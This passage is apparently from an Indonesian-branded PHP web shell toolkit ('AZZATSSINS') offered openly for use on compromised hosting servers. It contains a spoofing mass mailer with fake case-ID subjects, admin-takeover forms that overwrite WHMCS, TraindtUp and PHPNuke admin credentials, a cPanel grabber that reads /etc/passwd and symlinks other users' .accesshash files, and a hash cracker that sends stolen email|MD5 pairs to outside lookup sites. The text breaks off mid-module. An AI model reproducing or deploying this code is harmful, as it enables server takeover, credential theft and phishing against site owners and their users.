  2498. $kontol = "<font color=red> $msgtf </font> | <font color=red> $kabehekirim </font>Success | of total $kabehe emails sending to : $mail_to </br> From: $fromadress <br />Subject: $mail_subject <br />Content: $mail_content";
  2499. }
  2500. }
  2501. ?>
  2502. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  2503. <br /><br />
  2504. <form class="brd" method="post" style="border:1px solid #008000; padding:15px; text-align:left; -moz-border-radius: 10px; border-radius: 10px;" >
  2505. <table style="padding: 0 0 0 30px">
  2506. <tr><td><br />
  2507. <table style="padding: 0 0 0 30px">
  2508. <tr><td width="100">Target eMail :<td width="300">
  2509. <input style="witdh:250px;" type="text" value="<?php if(mail_to) {echo "$mail_to";} ?>" name="mail_to" />
  2510. </tr></td>
  2511. <tr><td>Sender Name :<td width="300">
  2512. <input style="witdh:250px;" type="text" value="<?php if(fromname) {echo "$fromname";} ?>" name="from_name" />
  2513. </tr></td>
  2514. <tr><td>Sender eMail :<td width="300">
  2515. <input style="witdh:250px;" type="text" value="<?php if(fromaddress) {echo "$fromaddress";} ?>" name="mail_from" />
  2516. </tr></td>
  2517. <tr><td>Subject :<td width="300">
  2518. <input style="witdh:250px;" type="text" value="<?php if(mail_subject) {echo "$mail_subject";} ?>" name="mail_subject" />
  2519. </tr></td>
  2520. <tr><td>Total of Send :<td width="300">
  2521. <input style="witdh:87px;" type="number" value="<?php if($_POST['banyak_email']) {echo $_POST['banyak_email'];} else {echo '100';} ?>" name="banyak_email" />
  2522. <input style="witdh:140px;" type="submit" value=" SUBMIT " name="kirim_email" />
  2523. </tr></td>
  2524. </table>
  2525. </td></tr>
  2526. <tr><td><br />
  2527. Message :
  2528. <center>
  2529. <textarea name="mail_content" cols="60" rows="8" >
  2530. <?php
  2531. if ($mail_content) {
  2532. echo "mail_content";
  2533. }
  2534. ?>
  2535. </textarea>
  2536. </center>
  2537. </td></tr>
  2538. </table>
  2539. </form><br />
  2540. <div class="brd" style="border:1px solid #008000; padding:15px; font-size:11px: text-align:left;">
  2541. <?php
  2542. echo "$kontol";
  2543. ?>
  2544. <?php }
  2545.  
  2546. if($_GET['whmcs']=="passchanger"){
  2547. ?>
  2548. <p><br/><body>
  2549. <center><nobr><b><span class="b7">O=:[ PASSWORD</span> <span class="b8">CHANGER ]:=O</span></b></nobr><br/><br/>
  2550. <p><form method="post">
  2551. <table border=1>
  2552. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  2553. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  2554. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  2555. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  2556. <tr><td>id_admin</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="1" name="idmaho"></td></tr>
  2557. <tr><td>new_username</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="azzatssins" name="userbaru"></td></tr>
  2558. <tr><td>new_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="17081945" name="passbaru"></td></tr>
  2559.  
  2560. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  2561. </table>
  2562. <br>
  2563. </form>
  2564. </center>
  2565.  
  2566. <?php
  2567. if(isset($_POST['plapon'])) {
  2568. $anu1 = $_POST['anu1'];
  2569. $anu2 = $_POST['anu2'];
  2570. $anu3 = $_POST['anu3'];
  2571. $anu4 = $_POST['anu4'];
  2572. @mysql_connect($anu1,$anu2,$anu3);
  2573. @mysql_select_db($anu4);
  2574.  
  2575. $idmaho=str_replace("\'","'",$idmaho);
  2576. $target_id = $_POST['idmaho'];
  2577. $userbaru=str_replace("\'","'",$userbaru);
  2578. $ganti_user = $_POST['userbaru'];
  2579. $passbaru=str_replace("\'","'",$passbaru);
  2580.  
  2581. $hash_pass = $_POST['passbaru'];
  2582. $ganti_pass = md5($hash_pass);
  2583.  
  2584. $colox = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
  2585. $coloxx = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
  2586.  
  2587. $udah_ganteng=@mysql_query($colox);
  2588. $udah_ganteng=@mysql_query($coloxx);
  2589. if($udah_ganteng)
  2590. {
  2591. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
  2592. }
  2593. }
  2594. }if($_GET['reseller']=="grabber"){
  2595. echo '<br><br><body bgcolor=black><center>
  2596. <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
  2597. <nobr><b><span class="b7">O=:[ CPANEL</span> <span class="b8">GRABBER ]:=O</nobr></span><br/><br/>
  2598. <form method="POST">
  2599. <center>
  2600. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
  2601. $uSr=file("/etc/passwd");
  2602. foreach($uSr as $usrr)
  2603. {
  2604. $str=explode(":",$usrr);
  2605. echo $str[0]."\n";
  2606. }
  2607. ?>
  2608.  
  2609. </textarea><p>
  2610. <nobr><font style="color:red;background-color:#000000">
  2611. [~] Home :
  2612. <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
  2613. <option title="home" value="home">home</option>
  2614. <option title="home2" value="home2">home2</option>
  2615. <option title="home3" value="home3">home3</option>
  2616. <option title="home4" value="home4">home4</option>
  2617. <option title="home5" value="home5">home5</option>
  2618. <option title="home6" value="home6">home6</option>
  2619. <option title="home7" value="home7">home7</option>
  2620. <option title="home8" value="home8">home8</option>
  2621. <option title="home9" value="home9">home9</option>
  2622. <option title="home10" value="home10">home10</option>
  2623. </select>&nbsp;&nbsp;&nbsp; [~] Htaccess :
  2624. <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
  2625. <option title="Apache" value="Options all
  2626. Options +Indexes
  2627. Options +FollowSymLinks
  2628. DirectoryIndex Sux.html
  2629. AddType text/plain .php
  2630. AddHandler server-parsed .php
  2631. AddType text/plain .html
  2632. AddHandler txt .html
  2633. Require None
  2634. Satisfy Any">Apache</option>
  2635. <option title="Litespeed" value="
  2636. Options +FollowSymLinks
  2637. DirectoryIndex seees.html
  2638. RemoveHandler .php
  2639. AddType application/octet-stream .php ">Litespeed</option>
  2640.  
  2641. </select> &nbsp;&nbsp; <input style="color:red;background-color:#000000" name="anu" size="10"
  2642. value="<< &nbsp;START SCAN&nbsp; >>" type="submit">
  2643. <br/><br/></form></center>
  2644.  
  2645. <?php
  2646. @ini_set('html_errors',0);
  2647. @ini_set('max_execution_time',0);
  2648. @ini_set('display_errors', 0);
  2649. @ini_set('file_uploads',1);
  2650. if ($_POST['anu']) {
  2651. $path = $_POST['path'];
  2652. $home = $_POST['home'];
  2653.  
  2654. $functions=@ini_get("disable_functions");
  2655. if(eregi("symlink",$functions))
  2656. {
  2657. die ('Kurang Ganteng Cok');
  2658. }
  2659. @mkdir(RESELLER, 0755);
  2660. @chdir(RESELLER);
  2661. $htaccess=$_POST['soft'];
  2662. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  2663.  
  2664. $passwd=explode("\n",$_POST["passwd"]); foreach($passwd as $pwd){
  2665. $user=trim($pwd);
  2666. @symlink('/'.$home.'/'.$user.'/public_html/moving.page/index.html',$user.' <~ RESELLER1');
  2667. @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER2');
  2668. @symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER3');
  2669. @symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ RESELLER4');
  2670. }
  2671. echo'<meta http-equiv="Refresh" content= "0; url=RESELLER"></body></html> ';
  2672. }
  2673. }
  2674.  
  2675.  
  2676.  
  2677. if($_GET['mas']=="mailer"){
  2678. set_time_limit(intval($_POST['timelimit']));
  2679. if (!function_exists('quoted_printable_encode')) {
  2680. function quoted_printable_encode($input, $line_max = 75)
  2681. {
  2682. $hex = array('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
  2683. $lines = preg_split("/(?:\r\n|\r|\n)/", $input);
  2684. $linebreak = "=0D=0A=\r\n";
  2685. $line_max = $line_max - strlen($linebreak);
  2686. $escape = "=";
  2687. $output = "";
  2688. $cur_conv_line = "";
  2689. $length = 0;
  2690. $whitespace_pos = 0;
  2691. $addtl_chars = 0;
  2692. for ($j = 0; $j < count($lines); $j++) {
  2693. $line = $lines[$j];
  2694. $linlen = strlen($line);
  2695. for ($i = 0; $i < $linlen; $i++) {
  2696. $c = substr($line, $i, 1);
  2697. $dec = ord($c);
  2698.  
  2699. $length++;
  2700.  
  2701. if ($dec == 32) {
  2702. if (($i == ($linlen - 1))) {
  2703. $c = "=20";
  2704. $length += 2;
  2705. }
  2706.  
  2707. $addtl_chars = 0;
  2708. $whitespace_pos = $i;
  2709. } elseif (($dec == 61) || ($dec < 32) || ($dec > 126)) {
  2710. $h2 = floor($dec / 16);
  2711. $h1 = floor($dec % 16);
  2712. $c = $escape . $hex["$h2"] . $hex["$h1"];
  2713. $length += 2;
  2714. $addtl_chars += 2;
  2715. }
  2716. if ($length >= $line_max) {
  2717. $cur_conv_line .= $c;
  2718. $whitesp_diff = $i - $whitespace_pos + $addtl_chars;
  2719. if (($i + $addtl_chars) > $whitesp_diff) {
  2720. $output .= substr($cur_conv_line, 0, (strlen($cur_conv_line) - $whitesp_diff)) . $linebreak;
  2721. $i = $i - $whitesp_diff + $addtl_chars;
  2722. } else {
  2723. $output .= $cur_conv_line . $linebreak;
  2724. }
  2725. $cur_conv_line = "";
  2726. $length = 0;
  2727. $whitespace_pos = 0;
  2728. } else {
  2729. $cur_conv_line .= $c;
  2730. }
  2731. }
  2732. $length = 0;
  2733. $whitespace_pos = 0;
  2734. $output .= $cur_conv_line;
  2735. $cur_conv_line = "";
  2736. if ($j <= count($lines) - 1) {
  2737. $output .= $linebreak;
  2738. }
  2739. }
  2740. return trim($output);
  2741. }
  2742. }
  2743.  
  2744. $action=$_POST['action'];
  2745. $from=$_POST['from'];
  2746. $subject=$_POST['subject'];
  2747. $realname=$_POST['realname'];
  2748. $replyto=$_POST['replyto'];
  2749. $message=$_POST['message'];
  2750. $emaillist=$_POST['emaillist'];
  2751. $file_name=$_FILES['file']['name'];
  2752. $contenttype=$_POST['contenttype'];
  2753. $file=$_FILES['file']['tmp_name'];
  2754. $amount=$_POST['amount'];
  2755. $encode_text=$_POST['encode'];
  2756.  
  2757.  
  2758. $message = urlencode($message);
  2759. $message = ereg_replace("%5C%22", "%22", $message);
  2760. $message = urldecode($message);
  2761. $message = stripslashes($message);
  2762. $subject = stripslashes($subject);
  2763. if ($encode_text == "yes") {
  2764. $subject = preg_replace('/([^a-z ])/ie', 'sprintf("=%02x",ord(StripSlashes("\\1")))', $subject);
  2765. $subject = str_replace(' ', '_', $subject);
  2766. $subject = "=?UTF-8?Q?$subject?=";
  2767. $realname = preg_replace('/([^a-z ])/ie', 'sprintf("=%02x",ord(StripSlashes("\\1")))', $realname);
  2768. $realname = str_replace(' ', '_', $realname);
  2769. $realname = "=?UTF-8?Q?$realname?=";
  2770. }
  2771. ?>
  2772. <form name="form1" method="post" action="" enctype="multipart/form-data">
  2773. <table width="842" border="0">
  2774. <tr>
  2775.  
  2776. <td width="95">
  2777. <div align="right">
  2778. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
  2779. </div>
  2780. </td>
  2781.  
  2782. <td width="220">
  2783. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  2784. <input type="text" name="from" placeholder="input your email sender" value="<?php print $from; ?>" size="30" />
  2785. </font>
  2786. </td>
  2787.  
  2788. <td width="238">
  2789. <div align="right">
  2790. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
  2791. </div>
  2792. </td>
  2793.  
  2794. <td width="271">
  2795. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  2796. <input type="text" name="realname" placeholder="input your name sender" value="<?php $realname; ?>" size="30" />
  2797. </font>
  2798. </td>
  2799. </tr>
  2800. <tr>
  2801. <td width="95">
  2802. <div align="right">
  2803. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
  2804. </div>
  2805. </td>
  2806. <td width="220">
  2807. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  2808. <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
  2809. </font>
  2810. </td>
  2811. <td width="238">
  2812. <div align="right">
  2813. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
  2814. </div>
  2815. </td>
  2816. <td width="271">
  2817. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  2818. <input type="file" name="file" size="24" />
  2819. </font>
  2820. </td>
  2821. </tr>
  2822. <tr>
  2823. <td width="95">
  2824. <div align="right">
  2825. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
  2826. </div>
  2827. </td>
  2828. <td colspan="3">
  2829. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  2830. <input type="text" name="subject" value="<?php $subject; ?>" size="90" />
  2831. </font>
  2832. </td>
  2833. </tr>
  2834. <td colspan="3" height="22" style="padding:10px;"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  2835.  
  2836. &nbsp; <font color="#FF0000">Encode sending information ?</font> <select style="background:#EFFBF8;;border: 1px solid #01A9DB;color:#333" size="1" name="encode">
  2837. <option <?php if($encode_text == "yes"){print "selected";} ?>>yes</option>
  2838. <option <?php if($encode_text == "no"){print "selected";} ?>>no</option>
  2839. </select></font></td>
  2840. <tr valign="top">
  2841. <td colspan="3">
  2842. <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
  2843. </td>
  2844. <td width="271">
  2845. <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email List :</font>
  2846. </td>
  2847. </tr>
  2848. <tr valign="top">
  2849. <td colspan="3">
  2850. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  2851. <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br /> <br />
  2852. <input type="radio" name="contenttype" value="plain" /> Plain
  2853. <input type="radio" name="contenttype" value="html"checked="checked" /> HTML
  2854. <input type="hidden" name="action" value="send" /><br />
  2855. Number to send: <input type="text" name="amount" value="1" size="10" /><br />
  2856. Maximum script execution time (in seconds, 0 for no timelimit) <input type="text" name="timelimit" value="0" size="10" /><br /> <br />
  2857. <input type="submit" value="Send Email" />
  2858. </font>
  2859. <p><div class="fb-like" data-href="https://www.facebook.com/AZZATSSINS.CYBERSERKERS" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div></p>
  2860. </td>
  2861. <td width="271">
  2862. <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  2863. <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
  2864. </font>
  2865. </td>
  2866. </tr>
  2867. </table>
  2868. </form><hr/>
  2869. <center>
  2870. <table style="width: 1024px;">
  2871. <tr>
  2872. <td style="width: 1024px;">
  2873. <div style="overflow:auto; width:1024px; height: 470px; font-size: 11px; color:lime" >
  2874. <?php
  2875. if ($action == "send") {
  2876. if (!$from && !$subject && !$message && !$emaillist) {
  2877. echo "<script>alert('Please complete all the fields.'); </script>";
  2878. exit;
  2879. }
  2880.  
  2881. $allemails = split("\n", $emaillist);
  2882. $numemails = count($allemails);
  2883.  
  2884. if ($file_name) {
  2885. if (!file_exists($file)) {
  2886. die("The file you are trying to upload could not be uploaded to the server");
  2887. }
  2888. $content = fread(fopen($file, "r"), filesize($file));
  2889. $content = chunk_split(base64_encode($content));
  2890. $uid = strtoupper(md5(uniqid(time())));
  2891. $name = basename($file);
  2892. }
  2893.  
  2894. for ($xx = 0; $xx < $amount; $xx++) {
  2895.  
  2896. for ($x = 0; $x < $numemails; $x++) {
  2897. $to = $allemails[$x];
  2898. if ($to) {
  2899. $to = ereg_replace(" ", "", $to);
  2900. $nrmail = $x + 1;
  2901. $domain = substr($from, strpos($from, "@"), strlen($from));
  2902. print "Sending $nrmail Email of $numemails to <font color=\"magenta\">$to</font> ==>";
  2903. flush();
  2904. $ranCaseID = ' (Case ID # PP-003-'.rand(111,999).'-'.rand(111,999).'-'.rand(111,999).')';
  2905. $subject = str_replace('randomcase', $ranCaseID, $subject);
  2906. $randfrom = rand();
  2907. $fromrand = str_replace('random', $randfrom, $from);
  2908. $header = "From: $realname <$fromrand>\r\nReply-To: $replyto\r\n";
  2909. $header .= "Message-ID: <31337$numemails.$nrmail$domain>\r\n";
  2910. $header .= "MIME-Version: 1.0\r\n";
  2911. if ($file_name)
  2912. $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  2913. if ($file_name)
  2914. $header .= "--$uid\r\n";
  2915. $header .= "Content-Type: text/$contenttype; charset=UTF-8\r\n";
  2916. $header .= "Content-Transfer-Encoding: quoted-printable\r\n\r\n";
  2917. $header .= quoted_printable_encode($message)."\r\n";
  2918. if ($file_name)
  2919. $header .= "--$uid\r\n";
  2920. if ($file_name)
  2921. $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  2922. if ($file_name)
  2923. $header .= "Content-Transfer-Encoding: base64\r\n";
  2924. if ($file_name)
  2925. $header .= "$content\r\n";
  2926. if ($file_name)
  2927. $header .= "--$uid--";
  2928. mail($to, $subject, "", $header);
  2929. print "<font color=\"yellow\"> <i>Success!</i></font><br>";
  2930. flush();
  2931. }
  2932. }
  2933. }
  2934.  
  2935. }
  2936. ?>
  2937. </div>
  2938. </td>
  2939. </tr>
  2940. </center>
  2941. <p class="style2">&nbsp;</p>
  2942. <p class="style1">&nbsp;</p>
  2943. <?php
  2944. if(isset($_POST['action']) && $numemails !==0 ){
  2945. echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";
  2946. }
  2947. ?>
  2948. </body>
  2949. </html>
  2950. <?php }
  2951.  
  2952. if($_GET['md5']=="decrypter"){
  2953. set_time_limit(0);
  2954. ?>
  2955. <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
  2956. <script type="text/JavaScript">
  2957. $(document).ready(function(){
  2958. $('pre').fadeIn(3000);
  2959.  
  2960. $('input[type="text"]').click(function(){
  2961. $(this).val('');
  2962. });
  2963.  
  2964.  
  2965.  
  2966. });
  2967.  
  2968. </script>
  2969.  
  2970. <?
  2971. if(!empty($_POST['password'])){
  2972. set_time_limit(0);
  2973. $password = nl2br($_POST['password']);
  2974.  
  2975. $ex = explode("<br />",$password);
  2976.  
  2977. $total_checked = 0;
  2978. $total_cracked = 0;
  2979. $total_failed = 0;
  2980. $total_not_md5 = 0;
  2981.  
  2982. foreach($ex as $cracking_password){
  2983. $total_checked++;
  2984. $cracking_passwords = explode("|",$cracking_password);
  2985. $cracking_password = explode("|",$cracking_password);
  2986. $cracking_password = $cracking_password[1];
  2987. echo $cracking_passwords[0]."|";
  2988. $cracking_password = trim($cracking_password);
  2989. $regex = "/[a-z0-9]{32}/i";
  2990.  
  2991. if(preg_match($regex,$cracking_password)){
  2992. $curl_crack = curl_init();
  2993.  
  2994. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5online.net");
  2995. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  2996. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"pass=".$cracking_password."&option=hash2text&send=Submit");
  2997. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  2998. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  2999. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  3000. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  3001.  
  3002.  
  3003. $exec = curl_exec($curl_crack);
  3004.  
  3005.  
  3006. if(preg_match("/pass : (.*)/",$exec,$cracked)){
  3007. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font>";
  3008. $total_cracked++;
  3009. flush();
  3010. }else{
  3011.  
  3012. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5decryption.com");
  3013. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  3014. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&submit=Decrypt+It%21");
  3015. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  3016. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  3017. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  3018. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  3019. $exec = curl_exec($curl_crack);
  3020.  
  3021.  
  3022.  
  3023. if(preg_match("/<font size=.*>(.+)<\/font>/",$exec,$cracked)){
  3024. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  3025. $total_cracked++;
  3026. flush();
  3027. }else{
  3028. $curl_crack = curl_init();
  3029. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5pass.info");
  3030. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  3031. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&get_pass=Get+Pass");
  3032. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  3033. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  3034. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  3035. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  3036.  
  3037.  
  3038.  
  3039. $exec = curl_exec($curl_crack);
  3040.  
  3041. if(preg_match("/Password - <b>(.*)<\/b>/",$exec,$cracked)){
  3042. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  3043. $total_cracked++;
  3044. flush();
  3045. }else{
  3046. $curl_crack = curl_init();
  3047. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5.noisette.ch");
  3048. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  3049. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password);
  3050. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  3051. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  3052. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  3053. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  3054.  
  3055.  
  3056.  
  3057. $exec = curl_exec($curl_crack);
  3058.  
  3059.  
  3060.  
  3061. if(preg_match('/= md5\("(.*)"\)/',$exec,$cracked)){
  3062. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  3063. $total_cracked++;
  3064. flush();
  3065. }else{
  3066.  
  3067. echo "<font size='2' color='red'><b>Not Found</b></font><br />";
  3068. $total_failed++;
  3069. flush();
  3070.  
  3071. }// Next update put the fifth website here
  3072.  
  3073. }
  3074. }
  3075.  
  3076.  
  3077.  
  3078.  
  3079.  
  3080.  
  3081.  
  3082.  
  3083.  
  3084.  
  3085.  
  3086.  
  3087. }
  3088. }
  3089.  
  3090. else{
  3091. $total_not_md5++;
  3092. echo $cracking_password."<br />";
  3093. flush();
  3094. continue;
  3095. }
  3096. //close curl //curl_close($curl_crack);
  3097. }
  3098.  
  3099. echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'><br><font size='2'>Total Password Checked : </font><b><font size='2'>".$total_checked."</font></b><br><font size='2' color='green'> Total Password Cracked : </font><font size='2'>".$total_cracked." </font><br><font size='2' color='red'> Total Password Faild : </font><b><font size='2'>".$total_failed."</font></b>"." </font><br><font size='2' color='orange'> Total Note Md5 : </font><b><font size='2'>".$total_not_md5."</font></b>";
  3100. }else{
  3101. ?>
  3102. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  3103. <center>
  3104. <form method="POST">
  3105.  
  3106.  
  3107. </textarea> <textarea cols='70' rows='15' name="password" placeholder="EMAIL|MD5"></textarea>
  3108.  
  3109. <br><br>
  3110. <input type="submit" name="crack" value="Crack Password">
  3111. <br>
  3112. </form>
  3113. </center>
  3114. <?
  3115. }}
  3116.  
  3117. if($_GET['traindt']=="login"){
  3118. set_time_limit(0);
  3119. echo "<html><head><title>TraindtUpLoginChanger</title></head>";
  3120. echo "<body><center>
  3121. <h2>AZZATSSINS</h2>
  3122. <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
  3123. <form method=POST action=''>
  3124. DB HOST<br/>
  3125. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  3126. DB NAME<br/>
  3127. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  3128. DB USER<br/>
  3129. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  3130. DB PASSWORD<br/>
  3131. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  3132. <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
  3133. <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
  3134. NEW ADMIN LOGIN USER<br/>
  3135. <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  3136. NEW ADMIN LOGIN PASS<br/>
  3137. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  3138.  
  3139. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  3140.  
  3141. $anu1 = $_POST['anu1'];
  3142. $anu2 = $_POST['anu2'];
  3143. $anu3 = $_POST['anu3'];
  3144. $anu4 = $_POST['anu4'];
  3145. @mysql_connect($anu1,$anu3,$anu4);
  3146. @mysql_select_db($anu2);
  3147.  
  3148. $idmaho=str_replace("\'","'",$idmaho);
  3149. $target_id = $_POST['idmaho'];
  3150.  
  3151. $userbaru=str_replace("\'","'",$userbaru);
  3152. $ganti_user = $_POST['userbaru'];
  3153.  
  3154. $passbaru=str_replace("\'","'",$passbaru);
  3155. $hash_pass = $_POST['passbaru'];
  3156. $ganti_pass = md5($hash_pass);
  3157.  
  3158. $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
  3159. $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
  3160.  
  3161. $oke=@mysql_query($sodok1);
  3162. $oke=@mysql_query($sodok2);
  3163. if($oke)
  3164. {
  3165. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  3166. }
  3167. }
  3168.  
  3169. if($_GET['nuke']=="login"){
  3170. set_time_limit(0);
  3171. echo "<html><head><title>PHPNukeLoginChanger</title></head>";
  3172. echo "<body><center>
  3173. <h2>AZZATSSINS</h2>
  3174. <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
  3175. <form method=POST action=''>
  3176. DB HOST<br/>
  3177. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  3178. DB NAME<br/>
  3179. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  3180. DB USER<br/>
  3181. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  3182. DB PASSWORD<br/>
  3183. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  3184. <hr style='color:lime;'>
  3185.  
  3186. TARGET PREFIX<br/>
  3187. <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
  3188. NEW ADMIN LOGIN USER<br/>
  3189. <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  3190. NEW ADMIN LOGIN PASS<br/>
  3191. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  3192.  
  3193. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  3194.  
  3195. $anu1 = $_POST['anu1'];
  3196. $anu2 = $_POST['anu2'];
  3197. $anu3 = $_POST['anu3'];
  3198. $anu4 = $_POST['anu4'];
  3199. @mysql_connect($anu1,$anu3,$anu4);
  3200. @mysql_select_db($anu2);
  3201.  
  3202. $userbaru=str_replace("\'","'",$userbaru);
  3203. $ganti_user = $_POST['userbaru'];
  3204. $passbaru=str_replace("\'","'",$passbaru);
  3205. $hash_pass = $_POST['passbaru'];
  3206. $ganti_pass = md5($hash_pass);
  3207.  
  3208. $prefix = $_POST['prefix'];
  3209. $table_name1 = $prefix."users" ;
  3210. $table_name2 = $prefix."authors" ;
  3211.  
  3212. $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
  3213. $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
  3214. $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
